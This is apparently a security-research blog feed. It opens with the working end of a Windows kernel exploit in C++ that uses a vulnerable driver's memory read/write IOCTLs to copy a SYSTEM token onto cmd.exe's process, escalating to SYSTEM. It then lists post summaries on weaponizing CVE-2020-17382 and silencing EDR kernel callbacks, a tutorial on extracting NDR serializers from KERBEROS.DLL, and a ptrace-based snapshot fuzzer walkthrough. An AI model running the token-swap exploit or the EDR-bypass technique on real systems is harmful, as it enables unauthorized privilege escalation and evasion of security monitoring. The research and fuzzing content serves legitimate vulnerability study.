            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x450; //ImageFileName
        INT64 imagename_value = *(PINT64)imagename_address;

        INT64 proc_token_addr = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x360; //Token
        INT64 proc_token = *(PINT64)proc_token_addr;

        INT64 pid_addr = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x2e8; //UniqueProcessId
        INT64 pid_value = *(PINT64)pid_addr;

        int sys_result = count(SYSTEM_procs.begin(), SYSTEM_procs.end(),
            imagename_value);

        if (sys_result != 0) {

            system_token_count++;
            system_tokens.token_name.push_back(imagename_value);
            system_tokens.token_value.push_back(proc_token);
        }

        if (imagename_value == 0x6578652e646d63) {
            //cout << "[>] cmd.exe found!\n";
            cmd_token_address = (start_address + proc_data.header_size[i] +
                proc_data.page_entry_offset[i] + 0x360);
        }
    }

    if (system_tokens.token_name.size() != 0 and cmd_token_address != 0) {
        cout << "\n[>] cmd.exe and SYSTEM token information found!\n";
        cout << "[>] Let's swap tokens!\n";
    }
    else if (cmd_token_address == 0) {
        cout << "[!] No cmd.exe token address found, exiting...\n";
        exit(1);
    }
}

void write(HANDLE hFile) {

    DWORD modulus = cmd_token_address % 0x1000;
    INT64 cmd_page = cmd_token_address - modulus;
    DWORD bytes_ret = 0x0;
    DWORD read_num_bytes = modulus;

    PBYTE output_buff = (PBYTE)VirtualAlloc(
        NULL,
        modulus + 0xc,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    READ_INPUT_BUFFER input_buff = { cmd_page, read_num_bytes };

    if (!DeviceIoControl(
        hFile,
        READ_IOCTL,
        &input_buff,
        0x40,
        output_buff,
        modulus + 0xc,
        &bytes_ret,
        NULL))
    {
        cout << "[!] Failed the read operation to copy the cmd.exe page...\n";
        cout << "[!] Last error: " << hex << GetLastError() << "\n";
        exit(1);
    }

    PBYTE results = (PBYTE)((INT64)output_buff + 0xc);

    PBYTE cmd_page_buff = (PBYTE)VirtualAlloc(
        NULL,
        modulus + 0x8,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);
   

    DWORD num_of_bytes = modulus + 0x8;

    INT64 start_address = cmd_token_address;
    cout << "[>] cmd.exe token located at: " << hex << start_address << "\n";
    INT64 new_token_val = system_tokens.token_value[0];
    cout << "[>] Overwriting token with value: " << hex << new_token_val << "\n";

    memcpy(cmd_page_buff, results, modulus);
    memcpy(cmd_page_buff + modulus, (void*)&new_token_val, 0x8);

    // PhysicalAddress
    // NumberOfBytes
    // Buffer to be copied into system space
    BYTE input[0x1000] = { 0 };
    memcpy(input, (void*)&cmd_page, 0x8);
    memcpy(input + 0x8, (void*)&num_of_bytes, 0x4);
    memcpy(input + 0xc, cmd_page_buff, modulus + 0x8);

    if (DeviceIoControl(
        hFile,
        WRITE_IOCTL,
        input,
        modulus + 0x8 + 0xc,
        NULL,
        0,
        &bytes_ret,
        NULL))
    {
        cout << "[>] Write operation succeeded, you should be nt authority/system\n";
    }
    else {
        cout << "[!] Write operation failed, exiting...\n";
        exit(1);
    }
}

int main()
{
    srand((unsigned)time(0));
    HANDLE hFile = grab_handle(DEVICE_NAME);

    PROC_DATA proc_data = read_mem(hFile);

    cout << "\n[>] Parsing procs...\n";
    parse_procs(proc_data, hFile);

    write(hFile);
}

Kernel exploitation: weaponizing CVE-2020-17382 MSI Ambient Link driver

24 September 2020 at 00:00
Preamble - Why are drivers still a valuable target? Kernels are, no euphemism intended, complex pieces of software and the Windows OS is no exception. Being one of the toughest to scrutinize due to its lack of source code and undocumented APIs, it is now becoming better documented thanks to the immense effort of the research community. Regrettably, during recent times, it has also increased in complexity and its mitigations have improved considerably.

Silencing the EDR. How to disable process, threads and image-loading detection callbacks.

15 July 2020 at 00:00
Background - TL;DR This post is about resuming Rui’s very inspiring piece on Windows kernel callbacks and taking it a little further by extending it with new functionality to build an all-purpose AV/EDR runtime detection bypass. Specifically, we are going to see how Kaspersky Total Security and Windows Defender are using kernel callbacks to either inhibit us from accessing the LSASS loaded modules or detect malicious activities. We’ll then use our evil driver to temporarily silence any registered AV’s callbacks and restore the EDR’s original code once we are done with our task.

Generating NDR Type Serializers for C#

By: tiraniddo
1 July 2020 at 21:32
As part of updating NtApiDotNet to v1.1.28 I added support for Kerberos authentication tokens. To support this I needed to write the parsing code for Tickets. The majority of the Kerberos protocol uses ASN.1 encoding, however some Microsoft specific parts such as the Privileged Attribute Certificate (PAC) uses Network Data Representation (NDR). This is due to these parts of the protocol being derived from the older NetLogon protocol which uses MSRPC, which in turn uses NDR.

I needed to implement code to parse the NDR stream and return the structured information. As I already had a class to handle NDR I could manually write the C# parser, but that'd take some time and it'd have to be carefully written to handle all use cases. It'd be much easier if I could just use my existing NDR byte code parser to extract the structure information from the KERBEROS DLL. I'd fortunately already written the feature, but it can be non-obvious how to use it. Therefore this blog post gives you an overview of how to extract NDR structure data from existing DLLs and create a standalone C# type serializer.

First up, how does KERBEROS parse the NDR structure? It could have manual implementations, but it turns out that one of the lesser known features of the MSRPC runtime on Windows is its ability to generate standalone structure and procedure serializers without needing to use an RPC channel. In the documentation this is referred to as Serialization Services.

To implement a Type Serializer you need to do the following in a C/C++ project. First, add the types to serialize inside an IDL file. For example the following defines a simple type to serialize.

interface TypeEncoders
{
    typedef struct _TEST_TYPE
    {
        [unique, string] wchar_t* Name;
        DWORD Value;
    } TEST_TYPE;
}

You then need to create a separate ACF file with the same name as the IDL file (i.e. if you have TYPES.IDL create a file TYPES.ACF) and add the encode and decode attributes.

interface TypeEncoders
{
    typedef [encode, decode] TEST_TYPE;
}

Compiling the IDL file using MIDL you'll get the client source code (such as TYPES_c.c), and you should find a few functions, the most important being TEST_TYPE_Encode and TEST_TYPE_Decode which serialize (encode) and deserialize (decode) a type from a byte stream. How you use these functions is not really important. We're more interested in understanding how the NDR byte code is configured to perform the serialization so that we can parse it and generate our own serializers. 

If you look at the Decode function when compiled for a X64 target it should look like the following:

void
TEST_TYPE_Decode(
    handle_t _MidlEsHandle,
    TEST_TYPE * _pType)
{
    NdrMesTypeDecode3(
         _MidlEsHandle,
         ( PMIDL_TYPE_PICKLING_INFO  )&__MIDL_TypePicklingInfo,
         &TypeEncoders_ProxyInfo,
         TypePicklingOffsetTable,
         0,
         _pType);
}

The NdrMesTypeDecode3 is an API implemented in the RPC runtime DLL. You might be shocked to hear this, but this function and its corresponding NdrMesTypeEncode3 are not documented in MSDN. However, the SDK headers contain enough information to understand how it works.

The API takes 6 parameters:
  1. The serialization handle, used to maintain state such as the current stream position and can be used multiple times to encode or decode more than one structure in a stream.
  2. The MIDL_TYPE_PICKLING_INFO structure. This structure provides some basic information such as the NDR engine flags.
  3. The MIDL_STUBLESS_PROXY_INFO structure. This contains the format strings and transfer types for both DCE and NDR64 syntax encodings.
  4. A list of type offset arrays; these contain the byte offset into the format string (from the Proxy Info structure) for all type serializers.
  5. The index of the type offset in the 4th parameter.
  6. A pointer to the structure to serialize or deserialize.

Only parameters 2 through 5 are needed to parse the NDR byte code correctly. Note that the NdrMesType*3 APIs are used for dual DCE and NDR64 serializers. If you compile as 32 bit it will instead use NdrMesType*2 APIs which only support DCE. I'll mention what you need to parse the DCE only APIs later, but for now most things you'll want to extract are going to have a 64 bit build which will almost always use NdrMesType*3 even though my tooling only parses the DCE NDR byte code.

To parse the type serializers you need to load the DLL you want to extract from into memory using LoadLibrary (to ensure any relocations are processed) then use either the Get-NdrComplexType PS command or the NdrParser::ReadPicklingComplexType method and pass the addresses of the 4 parameters.

Let's look at an example in KERBEROS.DLL. We'll pick the PAC_DEVICE_INFO structure as it's pretty complex and would require a lot of work to manually write a parser. If you disassemble the PAC_DecodeDeviceInfo function you'll see the call to NdrMesTypeDecode3 as follows (from the DLL in Windows 10 2004 SHA1:173767EDD6027F2E1C2BF5CFB97261D2C6A95969).

mov     [rsp+28h], r14  ; pObject
mov     dword ptr [rsp+20h], 5 ; nTypeIndex
lea     r9, off_1800F3138 ; ArrTypeOffset
lea     r8, stru_1800D5EA0 ; pProxyInfo
lea     rdx, stru_1800DEAF0 ; pPicklingInfo
mov     rcx, [rsp+68h]  ; Handle
call    NdrMesTypeDecode3

From this we can extract the following values:

MIDL_TYPE_PICKLING_INFO = 0x1800DEAF0
MIDL_STUBLESS_PROXY_INFO = 0x1800D5EA0
Type Offset Array = 0x1800F3138
Type Offset Index = 5

These addresses are using the default load address of the library which is unlikely to be the same as where the DLL is loaded in memory. Get-NdrComplexType supports specifying relative addresses from a base module, so subtract the base address of 0x180000000 before using them. The following script will extract the type information.

PS> $lib = Import-Win32Module KERBEROS.DLL
PS> $types = Get-NdrComplexType -PicklingInfo 0xDEAF0 -StublessProxy 0xD5EA0 `
     -OffsetTable 0xF3138 -TypeIndex 5 -Module $lib

As long as there was no error from this command, the $types variable will now contain the parsed complex types; in this case there'll be more than one. Now you can format them into a C# source code file to use in your application using Format-RpcComplexType.

PS> Format-RpcComplexType $types -Pointer

This will generate a C# file which looks like this. The code contains Encoder and Decoder classes with static methods for each structure. We also passed the Pointer parameter to Format-RpcComplexType. This is so that the structures are wrapped inside unique pointers. This is the default when using the real RPC runtime although, except for conformant structures, it isn't strictly necessary. If you don't do this then the decode will typically fail, certainly in this case.

You might notice a serious issue with the generated code: there are no proper structure names. This is unavoidable; the MIDL compiler doesn't keep any name information with the NDR byte code, only the structure information. However, the basic Visual Studio refactoring tool can make short work of renaming things if you know what the names are supposed to be. You could also manually rename everything in the parsed structure information before using Format-RpcComplexType.

In this case there is an alternative to all that. We can use the fact that the official MS documentation contains a full IDL for PAC_DEVICE_INFO and its related structures and build our own executable with the NDR byte code to extract. How does this help? If you reference the PAC_DEVICE_INFO structure as part of an RPC interface, not only can you avoid having to work out the offsets (as Get-RpcServer will automatically find the location), you can also use an additional feature to extract the type information from your private symbols to fix up the parsed type information.

Create a C++ project and in an IDL file copy the PAC_DEVICE_INFO structures from the protocol documentation. Then add the following RPC server.

[
    uuid(4870536E-23FA-4CD5-9637-3F1A1699D3DC),
    version(1.0),
]
interface RpcServer
{
    int Test([in] handle_t hBinding, 
             [unique] PPAC_DEVICE_INFO device_info);
}

Add the generated server C code to the project and add the following code somewhere to provide a basic implementation:

#pragma comment(lib, "rpcrt4.lib")

extern "C" void* __RPC_USER MIDL_user_allocate(size_t size) {
    return new char[size];
}

extern "C" void __RPC_USER MIDL_user_free(void* p) {
    delete[] p;
}

int Test(
    handle_t hBinding,
    PPAC_DEVICE_INFO device_info) {
    printf("Test %p\n", device_info);
    return 0;
}

Now compile the executable as a 64-bit release build if you're using 64-bit PS. The release build ensures there's no weird debug stub in front of your function which could confuse the type information. The implementation of Test needs to be unique, otherwise the linker will fold duplicate functions and the type information will be lost; we just printf a unique string.

Now parse the RPC server using Get-RpcServer and format the complex types.

PS> $rpc = Get-RpcServer RpcServer.exe -ResolveStructureNames
PS> Format-RpcComplexType $rpc.ComplexTypes -Pointer

If everything has worked you'll now find the output to be much more useful. Admittedly I also did a bit of further cleanup in my version in NtApiDotNet as I didn't need the encoders and I added some helper functions.

Before leaving this topic I should point out how to handle calls to NdrMesType*2 in case you need to extract data from a library which uses that API. The parameters are slightly different to NdrMesType*3.

void
TEST_TYPE_Decode(
    handle_t _MidlEsHandle,
    TEST_TYPE * _pType)
{
    NdrMesTypeDecode2(
         _MidlEsHandle,
         ( PMIDL_TYPE_PICKLING_INFO  )&__MIDL_TypePicklingInfo,
         &TypeEncoders_StubDesc,
         ( PFORMAT_STRING  )&types__MIDL_TypeFormatString.Format[2],
         _pType);
}
  1. The serialization handle.
  2. The MIDL_TYPE_PICKLING_INFO structure.
  3. The MIDL_STUB_DESC structure. This only contains DCE NDR byte code.
  4. A pointer into the format string for the start of the type.
  5. A pointer to the structure to serialize or deserialize.
Again we can discard the first and last parameters. You can then get the addresses of the middle three and pass them to Get-NdrComplexType.

PS> Get-NdrComplexType -PicklingInfo 0x1234 `
    -StubDesc 0x2345 -TypeFormat 0x3456 -Module $lib

You'll notice that there's an offset in the format string (2 in this case) which you can pass instead of the address in memory. It depends what information your disassembler shows:

PS> Get-NdrComplexType -PicklingInfo 0x1234 `
    -StubDesc 0x2345 -TypeOffset 2 -Module $lib

Hopefully this is useful for implementing these NDR serializers in C#. As they don't rely on any native code (or the RPC runtime) you should be able to use them on other platforms in .NET Core even if you can't use the ALPC RPC code.

APC Series: KiUserApcDispatcher and Wow64

28 June 2020 at 00:00
I recommend reading the previous posts before reading this one: User APC API, where we discussed the user-mode API of user APCs, and User APC Internals, where we discussed the implementation of user APCs in the kernel. Let’s continue our discussion about APC internals in Windows. This time we’ll discuss APC dispatching in user mode and how APCs work in Wow64 processes: the evolution of KiUserApcDispatcher, modifications to APC functions to support Wow64, and Wow64 APC injection techniques. The evolution of KiUserApcDispatcher: NTDLL contains a set of entry points that the kernel uses to run code in user mode like: KiUserExceptionDispatcher, KiUserCallbackDispatcher, …

Fuzzing Like A Caveman 4: Snapshot/Code Coverage Fuzzer!

By: h0mbre
13 June 2020 at 04:00

Introduction

Last time we blogged, we had a dumb fuzzer that would test an intentionally vulnerable program which performed some checks on a file: if the input file passed a check, it would progress to the next check, and if the input passed all checks the program would segfault. We discovered the importance of code coverage and how it can help reduce exponentially rare occurrences during fuzzing into linearly rare occurrences. Let’s get right into how we improved our dumb fuzzer!

Big thanks to @gamozolabs for all of his content that got me hooked on the topic.

Performance

First things first, our dumb fuzzer was slow as hell. If you remember, we were averaging about 1,500 fuzz cases per second with our dumb fuzzer. During my testing, AFL in QEMU mode (simulating not having source code available for compilation instrumentation) was hovering around 1,000 fuzz cases per second. This makes sense, since AFL does way more than our dumb fuzzer, especially in QEMU mode where we are emulating a CPU and providing code coverage.

Our target binary (-> HERE <-) would do the following:

  • extract the bytes from a file on disk into a buffer
  • perform 3 checks on the buffer to see if the indexes that were checked matched hardcoded values
  • segfault if all checks were passed, exit if one of the checks failed

Our dumb fuzzer would do the following:

  • extract bytes from a valid jpeg on disk into a byte buffer
  • mutate 2% of the bytes in the buffer by random byte overwriting
  • write the mutated file to disk
  • feed the mutated file to the target binary by executing a fork() and execvp() each fuzzing iteration

As you can see, this is a lot of file system interactions and syscalls. Let’s use strace on our vulnerable binary and see what syscalls the binary makes (for this post, I’ve hardcoded the .jpeg file into the vulnerable binary so that we don’t have to use command line arguments for ease of testing):

execve("/usr/bin/vuln", ["vuln"], 0x7ffe284810a0 /* 52 vars */) = 0
brk(NULL)                               = 0x55664f046000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=88784, ...}) = 0
mmap(NULL, 88784, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f0793d2e000
close(3)                                = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\260\34\2\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=2030544, ...}) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f0793d2c000
mmap(NULL, 4131552, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f079372c000
mprotect(0x7f0793913000, 2097152, PROT_NONE) = 0
mmap(0x7f0793b13000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1e7000) = 0x7f0793b13000
mmap(0x7f0793b19000, 15072, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f0793b19000
close(3)                                = 0
arch_prctl(ARCH_SET_FS, 0x7f0793d2d500) = 0
mprotect(0x7f0793b13000, 16384, PROT_READ) = 0
mprotect(0x55664dd97000, 4096, PROT_READ) = 0
mprotect(0x7f0793d44000, 4096, PROT_READ) = 0
munmap(0x7f0793d2e000, 88784)           = 0
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
brk(NULL)                               = 0x55664f046000
brk(0x55664f067000)                     = 0x55664f067000
write(1, "[>] Analyzing file: Canon_40D.jp"..., 35[>] Analyzing file: Canon_40D.jpg.
) = 35
openat(AT_FDCWD, "Canon_40D.jpg", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=7958, ...}) = 0
fstat(3, {st_mode=S_IFREG|0644, st_size=7958, ...}) = 0
lseek(3, 4096, SEEK_SET)                = 4096
read(3, "\v\260\v\310\v\341\v\371\f\22\f*\fC\f\\\fu\f\216\f\247\f\300\f\331\f\363\r\r\r&"..., 3862) = 3862
lseek(3, 0, SEEK_SET)                   = 0
write(1, "[>] Canon_40D.jpg is 7958 bytes."..., 33[>] Canon_40D.jpg is 7958 bytes.
) = 33
read(3, "\377\330\377\340\0\20JFIF\0\1\1\1\0H\0H\0\0\377\341\t\254Exif\0\0II"..., 4096) = 4096
read(3, "\v\260\v\310\v\341\v\371\f\22\f*\fC\f\\\fu\f\216\f\247\f\300\f\331\f\363\r\r\r&"..., 4096) = 3862
close(3)                                = 0
write(1, "[>] Check 1 no.: 2626\n", 22[>] Check 1 no.: 2626
) = 22
write(1, "[>] Check 2 no.: 3979\n", 22[>] Check 2 no.: 3979
) = 22
write(1, "[>] Check 3 no.: 5331\n", 22[>] Check 3 no.: 5331
) = 22
write(1, "[>] Check 1 failed.\n", 20[>] Check 1 failed.
)   = 20
write(1, "[>] Char was 00.\n", 17[>] Char was 00.
)      = 17
exit_group(-1)                          = ?
+++ exited with 255 +++

You can see that the target binary runs plenty of code before we even open the input file. Looking through the strace output, we don’t even open the input file until we’ve run the following syscalls:

execve
brk
access
access
openat
fstat
mmap
close
access
openat
read
openat
read
fstat
mmap
mmap
mprotect
mmap
mmap
arch_prctl
mprotect
mprotect
mprotect
munmap
fstat
brk
brk
write

After all of those syscalls, we finally open the file from the disk to read in the bytes with this line from the strace output:

openat(AT_FDCWD, "Canon_40D.jpg", O_RDONLY) = 3

So keep in mind, we run these syscalls every single fuzz iteration with our dumb fuzzer. Our dumb fuzzer (-> HERE <-) would write a file to disk every iteration and spawn an instance of the target program with fork() + execvp(). The vulnerable binary would run all of the start-up syscalls and finally read in the file from disk every iteration. So that's a couple dozen syscalls and two file system interactions every single fuzzing iteration. No wonder our dumb fuzzer was so slow.

Rudimentary Snapshot Mechanism

I started to think about how we could save time when fuzzing such a simple target binary. If I could figure out how to take a snapshot of the program’s memory after it had already read the file off of disk and stored the contents in its heap, I could save that process state, manually insert a new fuzzcase in place of the bytes that the target had read in, and then have the program run until it reaches an exit() call. Once the target hits the exit call, I would rewind the program state to what it was when I captured the snapshot, insert a new fuzz case, and do it all over again.

You can see how this would improve performance. We would skip all of the target binary's startup overhead and we would completely bypass all file system interactions. A huge difference would be that we would only make one call to fork(), which is an expensive syscall. For 100,000 fuzzing iterations, say, we’d go from 200,000 filesystem interactions (one for the dumb fuzzer to create a mutated.jpeg on disk, one for the target to read the mutated.jpeg) and 100,000 fork() calls to 0 file system interactions and only the initial fork().

In summary, our fuzzing process should look like this:

  1. Start target binary, but break on first instruction before anything runs
  2. Set breakpoints on a ‘start’ and ‘end’ location (start will be after the program reads in bytes from the file on disk, end will be the address of exit())
  3. Run the program until it hits the ‘start’ breakpoint
  4. Collect all writable memory sections of the process in a buffer
  5. Capture all register states
  6. Insert our fuzzcase into the heap overwriting the bytes that the program read in from file on disk
  7. Resume target binary until it reaches ‘end’ breakpoint
  8. Rewind process state to where it was at ‘start’
  9. Repeat from step 6

We are only doing steps 1-5 once, so this routine doesn’t need to be very fast. Steps 6-9 are where the fuzzer will spend 99% of its time, so we need this to be fast.
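
To make steps 4, 5, and 8 a bit more concrete, here's a minimal sketch of what the register and memory snapshotting could look like with ptrace() and /proc/<pid>/mem. This is not the fuzzer's actual code; the function names are mine, and it only handles a single writable region (whose bounds you'd parse out of /proc/<pid>/maps).

#include <sys/ptrace.h>
#include <sys/user.h>
#include <sys/types.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>

// Step 5: capture the debuggee's register state at the 'start' breakpoint.
struct user_regs_struct snapshot_regs(pid_t child_pid) {
    struct user_regs_struct regs;
    memset(&regs, 0, sizeof(regs));
    if (ptrace(PTRACE_GETREGS, child_pid, 0, &regs) == -1) {
        perror("ptrace");
        exit(errno);
    }
    return regs;
}

// Step 8 (registers): put them back exactly as they were at 'start'.
void restore_regs(pid_t child_pid, struct user_regs_struct *regs) {
    if (ptrace(PTRACE_SETREGS, child_pid, 0, regs) == -1) {
        perror("ptrace");
        exit(errno);
    }
}

// Steps 4/8 (memory): save or restore one writable region through
// /proc/<pid>/mem. While the child is stopped under ptrace we're allowed to
// read and write its memory this way, which is much faster than going
// 8 bytes at a time with PTRACE_PEEKTEXT/POKETEXT.
void copy_region(pid_t child_pid, unsigned long start, size_t len,
                 unsigned char *buf, int restore) {
    char path[64];
    snprintf(path, sizeof(path), "/proc/%d/mem", child_pid);
    int fd = open(path, restore ? O_WRONLY : O_RDONLY);
    if (fd == -1) {
        perror("open");
        exit(errno);
    }
    ssize_t done = restore ? pwrite(fd, buf, len, start)
                           : pread(fd, buf, len, start);
    if (done != (ssize_t)len) {
        perror("copy_region");
        exit(errno);
    }
    close(fd);
}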

Writing a Simple Debugger with Ptrace

In order to implement our snapshot mechanism, we’ll need to use the very intuitive, albeit apparently slow and restrictive, ptrace() interface. When I was getting started writing the debugger portion of the fuzzer a couple weeks ago, I leaned heavily on this blog post by Eli Bendersky which is a great introduction to ptrace() and shows you how to create a simple debugger.

Breakpoints

The debugger portion of our code doesn’t really need much functionality, it really only needs to be able to insert breakpoints and remove breakpoints. The way that you use ptrace() to set and remove breakpoints is to overwrite the byte at an address with the single-byte int3 opcode \xCC. However, if you just overwrite the value there while setting a breakpoint, it will be impossible to remove the breakpoint because you won’t know what value was held there originally, and so you won’t know what to overwrite \xCC with.

To begin using ptrace(), we spawn a second process with fork().

pid_t child_pid = fork();
if (child_pid == 0) {
    //we're the child process here
    execute_debugee(debugee);
}

Now we need to have the child process volunteer to be ‘traced’ by the parent process. This is done with the PTRACE_TRACEME argument, which we’ll use inside our execute_debugee function:

// request via PTRACE_TRACEME that the parent trace the child
long ptrace_result = ptrace(PTRACE_TRACEME, 0, 0, 0);
if (ptrace_result == -1) {
    fprintf(stderr, "\033[1;35mdragonfly>\033[0m error (%d) during ", errno);
    perror("ptrace");
    exit(errno);
}

The rest of the function doesn't involve ptrace but I'll go ahead and show it here because there is an important function to forcibly disable ASLR in the debuggee process. This is crucial as we'll be leveraging breakpoints at static addresses that must not change from process to process. We disable ASLR by calling personality() with ADDR_NO_RANDOMIZE. Separately, we'll route stdout and stderr to /dev/null so that we don't muddy our terminal with the target binary's output.

// disable ASLR
int personality_result = personality(ADDR_NO_RANDOMIZE);
if (personality_result == -1) {
    fprintf(stderr, "\033[1;35mdragonfly>\033[0m error (%d) during ", errno);
    perror("personality");
    exit(errno);
}
 
// dup both stdout and stderr and send them to /dev/null
int fd = open("/dev/null", O_WRONLY);
dup2(fd, 1);
dup2(fd, 2);
close(fd);
 
// exec our debugee program, NULL terminated to avoid Sentinel compilation
// warning. this replaces the fork() clone of the parent with the 
// debugee process 
int execl_result = execl(debugee, debugee, NULL);
if (execl_result == -1) {
    fprintf(stderr, "\033[1;35mdragonfly>\033[0m error (%d) during ", errno);
    perror("execl");
    exit(errno);
}

So first things first, we need a way to grab the one-byte value at an address before we insert our breakpoint. For the fuzzer, I developed a header file and source file I called ptrace_helpers to ease the process of using ptrace(). To grab the value, we'll read the 64-bit value at the address but only care about the byte all the way to the right. (I'm using the type long long unsigned because that's how register values are defined in <sys/user.h> and I wanted to keep everything the same.)

long long unsigned get_value(pid_t child_pid, long long unsigned address) {
    
    errno = 0;
    long long unsigned value = ptrace(PTRACE_PEEKTEXT, child_pid, (void*)address, 0);
    if (value == -1 && errno != 0) {
        fprintf(stderr, "dragonfly> Error (%d) during ", errno);
        perror("ptrace");
        exit(errno);
    }

    return value;	
}

So this function will use the PTRACE_PEEKTEXT argument to read the value located at address in the child process (child_pid) which is our target. So now that we have this value, we can save it off and insert our breakpoint with the following code:

void set_breakpoint(long long unsigned bp_address, long long unsigned original_value, pid_t child_pid) {

    errno = 0;
    long long unsigned breakpoint = ((original_value & 0xFFFFFFFFFFFFFF00) | 0xCC);
    int ptrace_result = ptrace(PTRACE_POKETEXT, child_pid, (void*)bp_address, (void*)breakpoint);
    if (ptrace_result == -1 && errno != 0) {
        fprintf(stderr, "dragonfly> Error (%d) during ", errno);
        perror("ptrace");
        exit(errno);
    }
}

You can see that this function takes the original value we gathered with the previous function and performs two bitwise operations to keep the upper 7 bytes intact while replacing the lowest byte with \xCC. Notice that we are now using PTRACE_POKETEXT. One of the frustrating features of the ptrace() interface is that we can only read and write 8 bytes at a time!
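This 8-byte limit matters beyond breakpoints: anything larger we want to poke into the debuggee (for example, a whole mutated fuzz case) has to be written in word-sized chunks. A minimal sketch of such a helper (my own illustration, not part of the post's ptrace_helpers) might look like this, assuming the length is a multiple of 8:

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/types.h>

// Write an arbitrary buffer into the debuggee 8 bytes at a time via
// PTRACE_POKETEXT. A real helper would also handle a trailing partial
// word with a read-modify-write using PTRACE_PEEKTEXT.
void write_buffer(pid_t child_pid, long long unsigned address,
                  unsigned char *buffer, size_t length) {
    for (size_t i = 0; i < length; i += 8) {
        long word;
        memcpy(&word, buffer + i, sizeof(word));
        if (ptrace(PTRACE_POKETEXT, child_pid,
                   (void *)(address + i), (void *)word) == -1) {
            perror("ptrace");
            exit(errno);
        }
    }
}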

So now that we can set breakpoints, the last function we need to implement is one to remove breakpoints, which would entail overwriting the int3 with the original byte value.

void revert_breakpoint(long long unsigned bp_address, long long unsigned original_value, pid_t child_pid) {

    errno = 0;
    int ptrace_result = ptrace(PTRACE_POKETEXT, child_pid, (void*)bp_address, (void*)original_value);
    if (ptrace_result == -1 && errno != 0) {
        fprintf(stderr, "dragonfly> Error (%d) during ", errno);
        perror("ptrace");
        exit(errno);
    }
}

Again, using PTRACE_POKETEXT, we can overwrite the \xCC with the original byte value. So now we have the ability to set and remove breakpoints.

Lastly, we’ll need a way to resume execution in the debuggee. This can be accomplished by utilizing the PTRACE_CONT argument in ptrace() as follows:

void resume_execution(pid_t child_pid) {

    int ptrace_result = ptrace(PTRACE_CONT, child_pid, 0, 0);
    if (ptrace_result == -1) {
        fprintf(stderr, "dragonfly> Error (%d) during ", errno);
        perror("ptrace");
        exit(errno);
    }
}

An important thing to note: if we hit a breakpoint at address 0x0000000000000000, rip will actually be at 0x0000000000000001. So after reverting our overwritten instruction to its previous value, we'll also need to subtract 1 from rip before resuming execution; we'll learn how to do this via ptrace in the next section.

Let’s now learn how we can utilize ptrace and the /proc pseudo files to create a snapshot of our target!

Snapshotting with ptrace and /proc

Register States

Another cool feature of ptrace() is the ability to capture and set register states in a debuggee process. We can do both of those things respectively with the helper functions I placed in ptrace_helpers.c:

// retrieve register states
struct user_regs_struct get_regs(pid_t child_pid, struct user_regs_struct registers) {
    int ptrace_result = ptrace(PTRACE_GETREGS, child_pid, 0, &registers);
    if (ptrace_result == -1) {
        fprintf(stderr, "dragonfly> Error (%d) during ", errno);
        perror("ptrace");
        exit(errno);
    }

    return registers;
}

// set register states
void set_regs(pid_t child_pid, struct user_regs_struct registers) {

    int ptrace_result = ptrace(PTRACE_SETREGS, child_pid, 0, &registers);
    if (ptrace_result == -1) {
        fprintf(stderr, "dragonfly> Error (%d) during ", errno);
        perror("ptrace");
        exit(errno);
    }
}

The struct user_regs_struct is defined in <sys/user.h>. You can see we use PTRACE_GETREGS and PTRACE_SETREGS respectively to retrieve register data and set register data. So with these two functions, we'll be able to capture a struct user_regs_struct of snapshot register values while we are sitting at our 'start' breakpoint, and when we reach our 'end' breakpoint, we'll be able to revert the register states (most importantly rip) to what they were when snapshotted.
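Combined with the breakpoint helpers from the previous section, handling a breakpoint hit (including the rip adjustment mentioned earlier) could look roughly like this - a sketch built only from the helpers already shown:

// After waitpid() reports a SIGTRAP stop, rip sits one byte past the 0xCC
// we planted, so we restore the original byte and move rip back by one.
void handle_breakpoint_hit(pid_t child_pid, long long unsigned bp_address,
                           long long unsigned original_value) {
    struct user_regs_struct registers;
    registers = get_regs(child_pid, registers);

    // put the original instruction byte back in place
    revert_breakpoint(bp_address, original_value, child_pid);

    // rewind rip so the original instruction actually gets executed
    registers.rip = registers.rip - 1;
    set_regs(child_pid, registers);
}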

Snapshotting Writable Memory Sections with /proc

Now that we have a way to capture register states, we'll need a way to capture writable memory states for our snapshot. I did this by interacting with the /proc pseudo files. I used GDB to break on the first function in vuln that performs a check; importantly, this function runs after vuln reads the jpeg off disk, so it will serve as our 'start' breakpoint. Once we break here in GDB, we can cat the /proc/$pid/maps file to get a look at how memory is mapped in the process (keep in mind GDB also forces ASLR off using the same method we did in our debugger). We can see the output here grepping for writable sections (ie, sections that could be clobbered during our fuzzcase run):

h0mbre@pwn:~/fuzzing/dragonfly_dir$ cat /proc/12011/maps | grep rw
